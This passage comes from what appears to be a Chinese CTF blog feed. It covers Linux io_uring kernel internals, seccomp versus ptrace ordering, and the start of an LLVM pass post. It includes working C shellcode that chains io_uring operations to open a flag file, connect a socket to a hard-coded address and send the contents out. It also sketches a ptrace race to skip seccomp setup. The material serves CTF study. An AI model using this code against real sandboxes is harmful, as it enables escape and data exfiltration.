raw_spin_unlock(&amp;wq-&gt;lock); return; &#125; raw_spin_unlock(&amp;wq-&gt;lock); /* fatal condition, failed to create the first worker */ match.fn = io_wq_work_match_item, match.data = work, match.cancel_all = false, io_acct_cancel_pending_work(wq, acct, &amp;match); &#125;&#125; 实际上调用了 io_wq_create_worker 1234567891011121314151617181920static bool io_wq_create_worker(struct io_wq *wq, struct io_wq_acct *acct)&#123; if (unlikely(!acct-&gt;max_workers)) pr_warn_once(&quot;io-wq is not configured for unbound workers&quot;); raw_spin_lock(&amp;wq-&gt;lock); if (acct-&gt;nr_workers &gt;= acct-&gt;max_workers) &#123; raw_spin_unlock(&amp;wq-&gt;lock); return true; &#125; // 如果已经有上限个 worker了 // 直接返回 acct-&gt;nr_workers++; raw_spin_unlock(&amp;wq-&gt;lock); atomic_inc(&amp;acct-&gt;nr_running); atomic_inc(&amp;wq-&gt;worker_refs); return create_io_worker(wq, acct-&gt;index); // 创建一个新worker&#125; create_io_worker | worker处理线程的创建 12345678910111213141516171819202122232425262728293031323334353637383940414243static bool create_io_worker(struct io_wq *wq, int index)&#123; struct io_wq_acct *acct = &amp;wq-&gt;acct[index]; struct io_worker *worker; struct task_struct *tsk; __set_current_state(TASK_RUNNING); worker = kzalloc(sizeof(*worker), GFP_KERNEL); // 为work分配了空间 if (!worker) &#123;fail: atomic_dec(&amp;acct-&gt;nr_running); raw_spin_lock(&amp;wq-&gt;lock); acct-&gt;nr_workers--; raw_spin_unlock(&amp;wq-&gt;lock); io_worker_ref_put(wq); return false; &#125; refcount_set(&amp;worker-&gt;ref, 1); worker-&gt;wq = wq; raw_spin_lock_init(&amp;worker-&gt;lock); init_completion(&amp;worker-&gt;ref_done); if (index == IO_WQ_ACCT_BOUND) worker-&gt;flags |= IO_WORKER_F_BOUND; tsk = create_io_thread(io_wq_worker, worker, NUMA_NO_NODE); // 创建处理线程 if (!IS_ERR(tsk)) &#123; io_init_new_worker(wq, worker, tsk); &#125; else if (!io_should_retry_thread(PTR_ERR(tsk))) &#123; kfree(worker); goto fail; &#125; else &#123; INIT_WORK(&amp;worker-&gt;work, io_workqueue_create); schedule_work(&amp;worker-&gt;work); &#125; return true;&#125; io_wq_worker | 内核任务线程 此线程就是线程池中worker的基本单元, 也是真正的异步io处理线程, 其通过自旋锁来阻塞进程, 直到有 work 需要完成. 中间一大段是和线程调度相关的代码, 包括设置信号处理之类的代码, 由于并不是当前分析的重点, 这里笔者就先跳过了. 最终, 是调用了 io_worker_handle_work 来处理任务 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162static int io_wq_worker(void *data)&#123; struct io_worker *worker = data; struct io_wq_acct *acct = io_wq_get_acct(worker); struct io_wq *wq = worker-&gt;wq; bool exit_mask = false, last_timeout = false; char buf[TASK_COMM_LEN]; worker-&gt;flags |= (IO_WORKER_F_UP | IO_WORKER_F_RUNNING); snprintf(buf, sizeof(buf), &quot;iou-wrk-%d&quot;, wq-&gt;task-&gt;pid); set_task_comm(current, buf); while (!test_bit(IO_WQ_BIT_EXIT, &amp;wq-&gt;state)) &#123; long ret; set_current_state(TASK_INTERRUPTIBLE); while (io_acct_run_queue(acct)) io_worker_handle_work(acct, worker); // 轮询 // 如果存在需要完成的work // io_acct_run_queue 就能持有 acct-&gt;lock 返回 raw_spin_lock(&amp;wq-&gt;lock); /* * Last sleep timed out. Exit if we&#x27;re not the last worker, * or if someone modified our affinity. */ if (last_timeout &amp;&amp; (exit_mask || acct-&gt;nr_workers &gt; 1)) &#123; acct-&gt;nr_workers--; raw_spin_unlock(&amp;wq-&gt;lock); __set_current_state(TASK_RUNNING); break; &#125; last_timeout = false; __io_worker_idle(wq, worker); // raw_spin_unlock(&amp;wq-&gt;lock); if (io_run_task_work()) continue; ret = schedule_timeout(WORKER_IDLE_TIMEOUT); if (signal_pending(current)) &#123; struct ksignal ksig; if (!get_signal(&amp;ksig)) continue; break; &#125; if (!ret) &#123; last_timeout = true; exit_mask = !cpumask_test_cpu(raw_smp_processor_id(), wq-&gt;cpu_mask); &#125; &#125; if (test_bit(IO_WQ_BIT_EXIT, &amp;wq-&gt;state) &amp;&amp; io_acct_run_queue(acct)) io_worker_handle_work(acct, worker); // worker handle 必须持有 acct-&gt;lock io_worker_exit(worker); return 0;&#125; io_worker_handle_work 这个函数必须持有 acct-&gt;lock 才能进入, 也是此函数真正开始处理任务 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980static void io_worker_handle_work(struct io_wq_acct *acct, struct io_worker *worker) __releases(&amp;acct-&gt;lock)&#123; struct io_wq *wq = worker-&gt;wq; bool do_kill = test_bit(IO_WQ_BIT_EXIT, &amp;wq-&gt;state); do &#123; struct io_wq_work *work; /* * If we got some work, mark us as busy. If we didn&#x27;t, but * the list isn&#x27;t empty, it means we stalled on hashed work. * Mark us stalled so we don&#x27;t keep looking for work when we * can&#x27;t make progress, any work completion or insertion will * clear the stalled flag. */ work = io_get_next_work(acct, worker); raw_spin_unlock(&amp;acct-&gt;lock); if (work) &#123; __io_worker_busy(wq, worker); /* * Make sure cancelation can find this, even before * it becomes the active work. That avoids a window * where the work has been removed from our general * work list, but isn&#x27;t yet discoverable as the * current work item for this worker. */ raw_spin_lock(&amp;worker-&gt;lock); worker-&gt;next_work = work; raw_spin_unlock(&amp;worker-&gt;lock); &#125; else &#123; break; &#125; io_assign_current_work(worker, work); __set_current_state(TASK_RUNNING); // 处理所有链起来的任务 do &#123; struct io_wq_work *next_hashed, *linked; unsigned int hash = io_get_work_hash(work); next_hashed = wq_next_work(work); // 获取下一个任务 if (unlikely(do_kill) &amp;&amp; (work-&gt;flags &amp; IO_WQ_WORK_UNBOUND)) work-&gt;flags |= IO_WQ_WORK_CANCEL; wq-&gt;do_work(work); // do_work 来处理任务 io_assign_current_work(worker, NULL); linked = wq-&gt;free_work(work); // 断链 work = next_hashed; // 将work改为下一个任务 if (!work &amp;&amp; linked &amp;&amp; !io_wq_is_hashed(linked)) &#123; work = linked; linked = NULL; &#125; io_assign_current_work(worker, work); if (linked) io_wq_enqueue(wq, linked); if (hash != -1U &amp;&amp; !next_hashed) &#123; /* serialize hash clear with wake_up() */ spin_lock_irq(&amp;wq-&gt;hash-&gt;wait.lock); clear_bit(hash, &amp;wq-&gt;hash-&gt;map); clear_bit(IO_ACCT_STALLED_BIT, &amp;acct-&gt;flags); spin_unlock_irq(&amp;wq-&gt;hash-&gt;wait.lock); if (wq_has_sleeper(&amp;wq-&gt;hash-&gt;wait)) wake_up(&amp;wq-&gt;hash-&gt;wait); &#125; &#125; while (work); // 不断循环执行, 直到链上清空 if (!__io_acct_run_queue(acct)) break; raw_spin_lock(&amp;acct-&gt;lock); &#125; while (1);&#125; 注意到这里调用了 do_work 来处理任务, do_work 实际指向的是 io_wq_submit_work, 最终还是调用了 io_issue_queue 来处理任务 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677void io_wq_submit_work(struct io_wq_work *work)&#123; struct io_kiocb *req = container_of(work, struct io_kiocb, work); // 通过 work 结构体 直接根据偏移计算拿到 req 的指针 const struct io_issue_def *def = &amp;io_issue_defs[req-&gt;opcode]; unsigned int issue_flags = IO_URING_F_UNLOCKED | IO_URING_F_IOWQ; bool needs_poll = false; int ret = 0, err = -ECANCELED; /* one will be dropped by -&gt;io_wq_free_work() after returning to io-wq */ if (!(req-&gt;flags &amp; REQ_F_REFCOUNT)) __io_req_set_refcount(req, 2); else req_ref_get(req); io_arm_ltimeout(req); /* either cancelled or io-wq is dying, so don&#x27;t touch tctx-&gt;iowq */ if (work-&gt;flags &amp; IO_WQ_WORK_CANCEL) &#123;fail: io_req_task_queue_fail(req, err); return; &#125; if (!io_assign_file(req, def, issue_flags)) &#123; err = -EBADF; work-&gt;flags |= IO_WQ_WORK_CANCEL; goto fail; &#125; if (req-&gt;flags &amp; REQ_F_FORCE_ASYNC) &#123; bool opcode_poll = def-&gt;pollin || def-&gt;pollout; if (opcode_poll &amp;&amp; file_can_poll(req-&gt;file)) &#123; needs_poll = true; issue_flags |= IO_URING_F_NONBLOCK; &#125; &#125; do &#123; ret = io_issue_sqe(req, issue_flags); // 最终还是调用了 io_issue_sqe 来处理任务 if (ret != -EAGAIN) break; /* * If REQ_F_NOWAIT is set, then don&#x27;t wait or retry with * poll. -EAGAIN is final for that case. */ if (req-&gt;flags &amp; REQ_F_NOWAIT) break; /* * We can get EAGAIN for iopolled IO even though we&#x27;re * forcing a sync submission from here, since we can&#x27;t * wait for request slots on the block side. */ if (!needs_poll) &#123; if (!(req-&gt;ctx-&gt;flags &amp; IORING_SETUP_IOPOLL)) break; if (io_wq_worker_stopped()) break; cond_resched(); continue; &#125; if (io_arm_poll_handler(req, issue_flags) == IO_APOLL_OK) return; /* aborted or ready, in either case retry blocking */ needs_poll = false; issue_flags &amp;= ~IO_URING_F_NONBLOCK; &#125; while (1); /* avoid locking problems by failing it from a clean context */ if (ret &lt; 0) io_req_task_queue_fail(req, ret);&#125; summary 笔者已经从上至下，透视了整个io_uring的实现// 当然，在这篇文章，笔者还留下了很多问题，比如linux kernel与同步和异步过程相关的实现， 由于笔者太菜了，对于kernel部分代码的分析也稍显吃力。 不过就这篇文章而言，在用户态io_uring的使用，笔者应该讲述得很清晰了。 最后，再让我们回到文章开始的问题： 如何只用一个 io_uring_setup 实现ORW? 在完全看完整篇文章后，大家应该也有答案了： 设置 IORING_SETUP_SQPOLL 此时不再需要 io_uring_submite 提交 设置 IORING_SETUP_NOMMAP 此时不再需要之后mmap ring和sqe TODO ctx 初始化分析 线程调度分析 wq队列处理分析 exp 笔者在实际利用时发现, 在笔者的笔记本的qemu的环境里, 似乎是因为只有一个core, 如果控制权转移给了io_sq_thread 线程, 除非其主动转移控制权, 主进程基本会直接阻塞, 因此, open sq的处理实际要在 io_uring_setup 创建返回fd之前, 因此 flag文件的fd为3 才能稳定应用 通过Socket连接写回： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758int main()&#123; struct io_uring_params params = &#123;0&#125;; char flag[0x10] = &quot;./flag\\x00&quot;; char buff[0x10] = &quot;AAAAAAAA\\n&quot;; void *ring_ptr; unsigned *ktail; struct &#123; __u64 a1; __u64 a2; &#125; socket_add = //&#123;0x0100007f5c110002, 0&#125;; &#123;0x017aa8c05c110002,0&#125;; // mmap(0xC0D3000uLL, 0x3000uLL, 7uLL, 34u, 0xFFFFFFFFuLL, 0LL); params.sq_off.user_addr = 0xC0D3000 + 0x1000; ring_ptr = params.cq_off.user_addr = 0xC0D3000 + 0x2000; params.flags = IORING_SETUP_SQPOLL | IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY; params.sq_thread_idle = 0x2000000; struct io_uring_sqe *sqe = (struct io_uring_sqe *)(0xC0D3000 + 0x1000); sqe[0].opcode = IORING_OP_OPENAT; sqe[0].flags = IOSQE_IO_LINK; sqe[0].fd = -100; sqe[0].addr = flag; sqe[1].opcode = IORING_OP_READ; sqe[1].flags = IOSQE_IO_LINK; sqe[1].fd = 3; sqe[1].addr = buff; sqe[1].len = 0x100; sqe[2].opcode = IORING_OP_SOCKET; sqe[2].flags = IOSQE_IO_LINK; sqe[2].fd = 2; sqe[2].off = 1; sqe[3].opcode = IORING_OP_CONNECT; sqe[3].flags = IOSQE_IO_LINK; sqe[3].fd = 5; sqe[3].flags = 4; sqe[3].addr = &amp;socket_add; sqe[3].off = 0x10; sqe[4].opcode = IORING_OP_WRITE; sqe[4].fd = 5; sqe[4].addr = buff; sqe[4].len = 0x100; ktail = ring_ptr + 4; io_uring_smp_store_release(ktail, 5); __do_syscall2(425, 0x10, &amp;params); while (1) &#123;&#125;; return 0;&#125; orw 123456789101112131415161718sqe[0].opcode = IORING_OP_OPENAT;sqe[0].flags = IOSQE_IO_HARDLINK;sqe[0].fd = -100;sqe[0].addr = flag;sqe[1].opcode = IORING_OP_READ;sqe[1].flags = IOSQE_IO_HARDLINK;sqe[1].fd = 3;sqe[1].addr = buff;sqe[1].len = 0x10;//sqe[4].flags = IOSQE_IO_HARDLINK;sqe[2].opcode = IORING_OP_WRITE;sqe[2].fd = 1;sqe[2].addr = buff;sqe[2].len = 0x10; 通过大量open避免 open的fd和 io_uring_setup 返回的fd竞争的问题 增强利用稳定性 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647sqe[0].opcode = IORING_OP_OPENAT;sqe[0].flags = IOSQE_IO_HARDLINK;sqe[0].fd = -100;sqe[0].addr = flag;sqe[1].opcode = IORING_OP_OPENAT;sqe[1].flags = IOSQE_IO_HARDLINK;sqe[1].fd = -100;sqe[1].addr = flag;sqe[2].opcode = IORING_OP_OPENAT;sqe[2].flags = IOSQE_IO_HARDLINK;sqe[2].fd = -100;sqe[2].addr = flag;sqe[3].opcode = IORING_OP_OPENAT;sqe[3].flags = IOSQE_IO_HARDLINK;sqe[3].fd = -100;sqe[3].addr = flag;sqe[4].opcode = IORING_OP_OPENAT;sqe[4].flags = IOSQE_IO_HARDLINK;sqe[4].fd = -100;sqe[4].addr = flag;sqe[5].opcode = IORING_OP_READ;sqe[5].flags = IOSQE_IO_HARDLINK;sqe[5].fd = 6;sqe[5].addr = buff;sqe[5].len = 0x100;sqe[6].opcode = IORING_OP_SOCKET;sqe[6].flags = IOSQE_IO_HARDLINK;sqe[6].fd = 2;sqe[6].off = 1;sqe[7].opcode = IORING_OP_CONNECT;sqe[7].flags = IOSQE_IO_HARDLINK;sqe[7].fd = 9;sqe[7].flags = 4;sqe[7].addr = &amp;socket_add;sqe[7].off = 0x10;sqe[8].opcode = IORING_OP_WRITE;sqe[8].fd = 9;sqe[8].addr = buff;sqe[8].len = 0x100; 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758int main()&#123; struct io_uring_params params = &#123;0&#125;; char flag[0x10] = &quot;./flag\\x00&quot;; char buff[0x10] = &quot;AAAAAAAA\\n&quot;; void *ring_ptr; unsigned *ktail; struct &#123; __u64 a1; __u64 a2; &#125; socket_add = //&#123;0x0100007f5c110002, 0&#125;; &#123;0x017aa8c05c110002,0&#125;; //mmap(0xC0D3000uLL, 0x3000uLL, 7uLL, 34u, 0xFFFFFFFFuLL, 0LL); params.sq_off.user_addr = 0xC0D3000 + 0x1000; ring_ptr = params.cq_off.user_addr = 0xC0D3000 + 0x2000; params.flags = IORING_SETUP_SQPOLL | IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY; params.sq_thread_idle = 0x2000000; struct io_uring_sqe *sqe = (struct io_uring_sqe *)(0xC0D3000 + 0x1000); sqe[0].opcode = IORING_OP_OPENAT; sqe[0].flags = IOSQE_IO_LINK; sqe[0].fd = -100; sqe[0].addr = flag; sqe[1].opcode = IORING_OP_OPENAT; sqe[1].flags = IOSQE_IO_LINK; sqe[1].fd = -100; sqe[1].addr = flag; sqe[2].opcode = IORING_OP_OPENAT; //sqe[2].flags = IOSQE_IO_LINK; sqe[2].fd = -100; sqe[2].addr = flag; sqe[3].opcode = IORING_OP_READ; //sqe[3].flags = IOSQE_IO_LINK; sqe[3].fd = 4; sqe[3].addr = buff; sqe[3].len = 0x100; sqe[4].opcode = IORING_OP_WRITE; //sqe[4].flags = IOSQE_IO_LINK; sqe[4].fd = 1; sqe[4].addr = buff; sqe[4].len = 0x100; ktail = ring_ptr + 4; io_uring_smp_store_release(ktail, 5); __do_syscall2(425, 0x10, &amp;params); while (1) &#123;&#125;; return 0;&#125;","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"linux","slug":"linux","permalink":"https://v3rdant.cn/tags/linux/"},{"name":"io_uring","slug":"io-uring","permalink":"https://v3rdant.cn/tags/io-uring/"},{"name":"shellcode","slug":"shellcode","permalink":"https://v3rdant.cn/tags/shellcode/"}]},{"title":"Linux.Seccomp-and-Ptrace","slug":"Linux.Seccomp-and-Ptrace","date":"2023-10-30T16:00:00.000Z","updated":"2024-03-04T07:37:44.360Z","comments":true,"path":"Linux.Seccomp-and-Ptrace/","link":"","permalink":"https://v3rdant.cn/Linux.Seccomp-and-Ptrace/","excerpt":"Background 最近ACTF出现了一个限制非常严格的沙箱，校队里一位pwn师傅搜到了一些用ptrace修改子进程rax来绕过seccomp的wp。 正值校赛，为了出题的事忙得焦头烂额，就没有细想。 但是由于我记得seccomp 是内核hook，而ptrace， 出于一些对调试器的印象，我觉得他对于attach的子进程的寄存器的更改，是在用户态实现的。 那么ptrace的处理应该在seccomp之前，所以我觉得不太可行。 在有时间后，我开始探究了一下，确实不太可行，只是原因跟我想象得不太一样…","text":"Background 最近ACTF出现了一个限制非常严格的沙箱，校队里一位pwn师傅搜到了一些用ptrace修改子进程rax来绕过seccomp的wp。 正值校赛，为了出题的事忙得焦头烂额，就没有细想。 但是由于我记得seccomp 是内核hook，而ptrace， 出于一些对调试器的印象，我觉得他对于attach的子进程的寄存器的更改，是在用户态实现的。 那么ptrace的处理应该在seccomp之前，所以我觉得不太可行。 在有时间后，我开始探究了一下，确实不太可行，只是原因跟我想象得不太一样… Intro 在开始之前，先介绍一下三个概念： seccome prctl ptrace 如果没有提到，以上代码均来自linux-6.6 prctl / seccomp prctl 是linux下一个实现进程操控的系统调用。 123456789101112131415161718192021222324252627282930313233343536373839SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3, unsigned long, arg4, unsigned long, arg5)&#123; struct task_struct *me = current; unsigned char comm[sizeof(me-&gt;comm)]; long error; error = security_task_prctl(option, arg2, arg3, arg4, arg5); if (error != -ENOSYS) return error; error = 0; switch (option) &#123; case PR_SET_PDEATHSIG: if (!valid_signal(arg2)) &#123; error = -EINVAL; break; &#125; me-&gt;pdeath_signal = arg2; break; /* ............. 省略若干 ............. */ case PR_GET_SECCOMP: error = prctl_get_seccomp(); break; /* ............. 省略若干 ............. */ default: error = -EINVAL; break; &#125; return error;&#125; 阅读源码和man doc， 可以看到prctl主要实现了两类命令，SET 和 GET ， 即操作进程运行时和获取进程信息。 而seccomp就是基于prctl实现的。 12case PR_SET_SECCOMP: error = prctl_set_seccomp(arg2, (char __user *)arg3); 这里涉及到这样一条调用链 12345--&gt;prctl --&gt;prctl_set_seccomp --&gt;do_seccomp --&gt;seccomp_set_mode_filter --&gt; seccomp_attach_filter seccomp_attach_filter 核心代码如下： 1234filter-&gt;prev = current-&gt;seccomp.filter;seccomp_cache_prepare(filter);current-&gt;seccomp.filter = filter;atomic_inc(&amp;current-&gt;seccomp.filter_count); current是一个全局的指针，指向当前进程的task结构体，主要保存了当前进程的一些信息。 所以，当我们注册seccomp，实际上就是设置了当前进程的filter规则。而什么时候根据这个规则进行过滤呢？ 笔者将在syscall的分析中给出答案。 ptrace ptrace是用来跟踪进程的一个系统调用 当使用ptrace进行 PTRACE_SYSCALL 也就是一般我们劫持系统调用的操作时： ptrace的调用链如下 12345--&gt;PTRACE_SYSCALL --&gt;arch_ptrace --&gt;ptrace_request --&gt; ptrace_resume --&gt;set_task_syscall_work 可以看到最终调用了set_task_syscall_work 宏 12#define set_task_syscall_work(t, fl) \\ set_bit(SYSCALL_WORK_BIT_##fl, &amp;task_thread_info(t)-&gt;syscall_work) 这个宏通过task_thread_info获取了监视的进程的记录结构地址（当被监视进程运行时，此时current指针也指向这个结构，但是此时是监视程序运行时，所以通过task_thread_info取得其地址） 在获取结构体地址后设置了 SYSCALL_WORK_BIT ， 一个标志位， 也就是说，实际上ptrace:PTRACE_SYSCALL 和 prctl: PR_SET_SECCOMP 都只是在进程info上添加了一些信息，最终真正的处理要等到syscall中。 syscall syscall 是如何处理 seccomp 以及ptrace 的呢？ 其经过了如下调用链 12345--&gt;entry_SYSCALL_64 --&gt;do_syscall_64 --&gt;syscall_enter_from_user_mode --&gt;__syscall_enter_from_user_work --&gt;syscall_trace_enter syscall_trace_enter代码如下 12345678910111213141516171819202122232425262728293031323334353637383940static long syscall_trace_enter(struct pt_regs *regs, long syscall, unsigned long work)&#123; long ret = 0; /* * Handle Syscall User Dispatch. This must comes first, since * the ABI here can be something that doesn&#x27;t make sense for * other syscall_work features. */ if (work &amp; SYSCALL_WORK_SYSCALL_USER_DISPATCH) &#123; if (syscall_user_dispatch(regs)) return -1L; &#125; /* Handle ptrace */ if (work &amp; (SYSCALL_WORK_SYSCALL_TRACE | SYSCALL_WORK_SYSCALL_EMU)) &#123; ret = ptrace_report_syscall_entry(regs); if (ret || (work &amp; SYSCALL_WORK_SYSCALL_EMU)) return -1L; &#125; /* Do seccomp after ptrace, to catch any tracer changes. */ if (work &amp; SYSCALL_WORK_SECCOMP) &#123; ret = __secure_computing(NULL); if (ret == -1L) return ret; &#125; /* Either of the above might have changed the syscall number */ syscall = syscall_get_nr(current, regs); if (unlikely(work &amp; SYSCALL_WORK_SYSCALL_TRACEPOINT)) trace_sys_enter(regs, syscall); syscall_enter_audit(regs, syscall); return ret ? : syscall;&#125; 其中work由 READ_ONCE(current_thread_info()-&gt;syscall_work) 得到 12345678910static __always_inline long__syscall_enter_from_user_work(struct pt_regs *regs, long syscall)&#123; unsigned long work = READ_ONCE(current_thread_info()-&gt;syscall_work); if (work &amp; SYSCALL_WORK_ENTER) syscall = syscall_trace_enter(regs, syscall, work); return syscall;&#125; 由前面的分析我们可以知道， ptrace最终就是设置了SYSCALL_WORK_BIT 也因此，这里的检测和处理，如注释所说的，就是处理我们在前面看到的seccomp和ptrace。 再看 PTRACE_SYSCALL 的实际处理函数 ptrace_report_syscall。 其中发送了SYSTRAP信号， 会让当前进程阻塞。等待ptrace的处理。 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950/* * ptrace report for syscall entry and exit looks identical. */static inline int ptrace_report_syscall(unsigned long message)&#123; int ptrace = current-&gt;ptrace; int signr; if (!(ptrace &amp; PT_PTRACED)) return 0; signr = ptrace_notify(SIGTRAP | ((ptrace &amp; PT_TRACESYSGOOD) ? 0x80 : 0), message); /* * this isn&#x27;t the same as continuing with a signal, but it will do * for normal use. strace only continues with a signal if the * stopping signal is not SIGTRAP. -brl */ if (signr) send_sig(signr, current, 1); return fatal_signal_pending(current);&#125;/** * ptrace_report_syscall_entry - task is about to attempt a system call * @regs: user register state of current task * * This will be called if %SYSCALL_WORK_SYSCALL_TRACE or * %SYSCALL_WORK_SYSCALL_EMU have been set, when the current task has just * entered the kernel for a system call. Full user register state is * available here. Changing the values in @regs can affect the system * call number and arguments to be tried. It is safe to block here, * preventing the system call from beginning. * * Returns zero normally, or nonzero if the calling arch code should abort * the system call. That must prevent normal entry so no system call is * made. If @task ever returns to user mode after this, its register state * is unspecified, but should be something harmless like an %ENOSYS error * return. It should preserve enough information so that syscall_rollback() * can work (see asm-generic/syscall.h). * * Called without locks, just after entering kernel mode. */static inline __must_check int ptrace_report_syscall_entry( struct pt_regs *regs)&#123; return ptrace_report_syscall(PTRACE_EVENTMSG_SYSCALL_ENTRY);&#125; 正如注释所说，通过ptrace拦截系统调用后，对于寄存器的修改，都是在这个时间发生的。 This will be called if %SYSCALL_WORK_SYSCALL_TRACE or %SYSCALL_WORK_SYSCALL_EMU have been set, when the current task has just entered the kernel for a system call. Full user register state is available here. Changing the values in @regs can affect the system call number and arguments to be tried. It is safe to block here, preventing the system call from beginning.&gt; 而这一处理，在seccomp前面，所以即使通过ptrace拦截系统调用修改系统调用号后，seccomp还是会进行检查。 那为什么网上会有相关WP呢？ 以下为linux-4.7的代码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126/* * We can return 0 to resume the syscall or anything else to go to phase * 2. If we resume the syscall, we need to put something appropriate in * regs-&gt;orig_ax. * * NB: We don&#x27;t have full pt_regs here, but regs-&gt;orig_ax and regs-&gt;ax * are fully functional. * * For phase 2&#x27;s benefit, our return value is: * 0: resume the syscall * 1: go to phase 2; no seccomp phase 2 needed * anything else: go to phase 2; pass return value to seccomp */unsigned long syscall_trace_enter_phase1(struct pt_regs *regs, u32 arch)&#123; struct thread_info *ti = pt_regs_to_thread_info(regs); unsigned long ret = 0; u32 work; if (IS_ENABLED(CONFIG_DEBUG_ENTRY)) BUG_ON(regs != task_pt_regs(current)); work = ACCESS_ONCE(ti-&gt;flags) &amp; _TIF_WORK_SYSCALL_ENTRY;#ifdef CONFIG_SECCOMP /* * Do seccomp first -- it should minimize exposure of other * code, and keeping seccomp fast is probably more valuable * than the rest of this. */ if (work &amp; _TIF_SECCOMP) &#123; struct seccomp_data sd; sd.arch = arch; sd.nr = regs-&gt;orig_ax; sd.instruction_pointer = regs-&gt;ip;#ifdef CONFIG_X86_64 if (arch == AUDIT_ARCH_X86_64) &#123; sd.args[0] = regs-&gt;di; sd.args[1] = regs-&gt;si; sd.args[2] = regs-&gt;dx; sd.args[3] = regs-&gt;r10; sd.args[4] = regs-&gt;r8; sd.args[5] = regs-&gt;r9; &#125; else#endif &#123; sd.args[0] = regs-&gt;bx; sd.args[1] = regs-&gt;cx; sd.args[2] = regs-&gt;dx; sd.args[3] = regs-&gt;si; sd.args[4] = regs-&gt;di; sd.args[5] = regs-&gt;bp; &#125; BUILD_BUG_ON(SECCOMP_PHASE1_OK != 0); BUILD_BUG_ON(SECCOMP_PHASE1_SKIP != 1); ret = seccomp_phase1(&amp;sd); if (ret == SECCOMP_PHASE1_SKIP) &#123; regs-&gt;orig_ax = -1; ret = 0; &#125; else if (ret != SECCOMP_PHASE1_OK) &#123; return ret; /* Go directly to phase 2 */ &#125; work &amp;= ~_TIF_SECCOMP; &#125;#endif /* Do our best to finish without phase 2. */ if (work == 0) return ret; /* seccomp and/or nohz only (ret == 0 here) */#ifdef CONFIG_AUDITSYSCALL if (work == _TIF_SYSCALL_AUDIT) &#123; /* * If there is no more work to be done except auditing, * then audit in phase 1. Phase 2 always audits, so, if * we audit here, then we can&#x27;t go on to phase 2. */ do_audit_syscall_entry(regs, arch); return 0; &#125;#endif return 1; /* Something is enabled that we can&#x27;t handle in phase 1 */&#125;/* Returns the syscall nr to run (which should match regs-&gt;orig_ax). */long syscall_trace_enter_phase2(struct pt_regs *regs, u32 arch, unsigned long phase1_result)&#123; struct thread_info *ti = pt_regs_to_thread_info(regs); long ret = 0; u32 work = ACCESS_ONCE(ti-&gt;flags) &amp; _TIF_WORK_SYSCALL_ENTRY; if (IS_ENABLED(CONFIG_DEBUG_ENTRY)) BUG_ON(regs != task_pt_regs(current));#ifdef CONFIG_SECCOMP /* * Call seccomp_phase2 before running the other hooks so that * they can see any changes made by a seccomp tracer. */ if (phase1_result &gt; 1 &amp;&amp; seccomp_phase2(phase1_result)) &#123; /* seccomp failures shouldn&#x27;t expose any additional code. */ return -1; &#125;#endif if (unlikely(work &amp; _TIF_SYSCALL_EMU)) ret = -1L; if ((ret || test_thread_flag(TIF_SYSCALL_TRACE)) &amp;&amp; tracehook_report_syscall_entry(regs)) ret = -1L; if (unlikely(test_thread_flag(TIF_SYSCALL_TRACEPOINT))) trace_sys_enter(regs, regs-&gt;orig_ax); do_audit_syscall_entry(regs, arch); return ret ?: regs-&gt;orig_ax;&#125; 对seccomp 的处理在 syscall_trace_enter_phase1， 而处理ptrace的tracehook_report_syscall_entry 在syscall_trace_enter_phase2 seccomp的过滤在ptrace之前。 所以，在4.8以下，这种攻击是可以实现的。 Tricks 那么ptrace在绕过沙箱时是不是完全没有用了呢，也不是。 在和@cnitlrt 师傅交流后，得知了一个很骚操作的办法。 使用nc 连接两次，产生了两个进程，如果能在第二个进程运行前，通过ptrace截停prctl的调用，改成随便一个无关调用，就可以实现沙盒的绕过 这里存在三个问题： 首先是如何获得第二个进程的pid： 在CTF这种比较纯净的环境，可以认为两个进程PID相近，把当前进程的PID加1或者加2就可以。 其次是如何实现在第二次进程运行seccomp前的窗口期实现ptrace上此进程： 可以通过在一个进程使用ptrace attach轮询，直到执行成功返回1。不过也有失败的概率。 第三也是最终限制了这个tricks的使用的是，我们都知道，ptrace默认只能attach到自己的子进程，除非 /proc/sys/kernel/yama/ptrace_scope 设置为0， 在个人用户使用时，为了方便gdb等调试器，这个选项一般是0， 然而，当我随便开了个ubuntu的docker看了一下后： 12$ cat proc/sys/kernel/yama/ptrace_scope 1 啊这，这，那没事了","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"linux","slug":"linux","permalink":"https://v3rdant.cn/tags/linux/"}]},{"title":"Pwn.I wanna be a llvm passer","slug":"Pwn.I-Wanna-be-A-LLVM-Passer","date":"2023-06-22T16:00:00.000Z","updated":"2024-01-26T14:38:52.763Z","comments":true,"path":"Pwn.I-Wanna-be-A-LLVM-Passer/","link":"","permalink":"https://v3rdant.cn/Pwn.I-Wanna-be-A-LLVM-Passer/","excerpt":"overview 华中赛遇到了一个llvm的题，顺手系统总结一下llvm pass吧。 首先简单介绍一下llvm，llvm是一套用C++编写的编译器基础设施。LLVM Pass提供了一些可供重写的函数，本义是用来实现一些优化。而Pwn的llvm pass类题，就是重写了runOnFunction函数。","text":"overview 华中赛遇到了一个llvm的题，顺手系统总结一下llvm pass吧。 首先简单介绍一下llvm，llvm是一套用C++编写的编译器基础设施。LLVM Pass提供了一些可供重写的函数，本义是用来实现一些优化。而Pwn的llvm pass类题，就是重写了runOnFunction函数。 ll和bc是llvm生成的IR的两种形式，分别是适合人类阅读的文本形式和二进制形式，可以用如下命令转换。 12345.c -&gt; .ll：clang -emit-llvm -S a.c -o a.ll.c -&gt; .bc: clang -emit-llvm -c a.c -o a.bc.ll -&gt; .bc: llvm-as a.ll 